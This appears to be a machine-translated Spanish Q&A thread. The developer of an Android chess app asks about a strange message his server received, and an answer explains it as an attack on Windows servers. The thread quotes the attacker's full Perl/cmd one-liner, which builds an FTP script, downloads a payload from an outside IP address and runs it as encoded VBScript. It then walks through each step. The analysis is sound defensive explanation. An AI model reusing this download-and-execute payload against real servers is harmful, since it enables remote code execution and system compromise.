tipos que pirateria piratas informaticos informatica causas caracteristicas android perl cmd server

android - que - tipos de piratas informaticos



Recibí en mi servidor un mensaje que podría ser de un pirata informático (1)

De hecho, esto parece un ataque (o un intento). Si dividí la alineación, termino con lo siguiente:

El "individuo" intenta ejecutar algún código en su servidor. Primero crea un archivo llamado f con el siguiente contenido:

bin get azb.zip %temp%/z.zip bye

Luego ejecuta el comando ftp con ese archivo como entrada, es decir, se conecta a 112.213.127.52 y obtiene el archivo azb.zip y lo almacena localmente (en su servidor) como %temp%/z.zip

Finalmente se ejecuta

cscript.exe /b /e:VBScript.Encode %temp%/z.zip 579562847 macu://58.238.143.25:88/h

El fragmento completo está envuelto en un perl una sola línea. La función de system() de Perl system() simplemente ejecuta el comando externo que se le ha asignado, en este caso el cmd.exe . Creo que ya está hecho porque es muy poco probable que su servidor ejecute cmd.exe pero puede ejecutar perl porque perl se usa con frecuencia para scripts de servidor (por ejemplo, scripts cgi).

Una buena noticia es que esto funcionará solo si se cumplen todas las condiciones siguientes:

  • Su servidor debe tener instalado perl.exe
  • debe tener instalado cmd.exe
  • debe tener instalado cscript.exe
  • debe interpretar %temp% correctamente
  • Lo más importante: su servidor y su aplicación del lado del servidor deben configurarse para ejecutar código arbitrario que se proporcionó a través de una solicitud GET, que no es muy probable.

Este sitio dice que la dirección 58.238.143.25 es de Corea del Sur y 112.213.127.52 es de Hong Kong.

No me importaría Este es un ataque para servidores basados ​​en Windows. ¿Es tuyo?

Tengo una aplicación de ajedrez en línea hecha en Android.

Superviso todos los mensajes que el servidor recibe después de que el cliente ha llamado .accept() y leo el BufferedReader() .

Hace poco recibí un mensaje muy extraño de un usuario desconocido, que no coincide en absoluto con el formato de mensaje habitual que obtengo.

Esto fue lo que el servidor recibió:

?2 28 /perl.exe -esystem(''cmd.exe /c echo bin>f&echo get azb.zip %temp%//z.zip>>f&echo bye>>f&ftp -A -s:f 112.213.127.52 &cscript.exe /b /e:VBScript.Encode %temp%//z.zip 579562847 macu://58.238.143.25:88/h'')

¿Alguien tiene alguna idea de qué es esto? Y si es peligroso, ¿qué puedo hacer?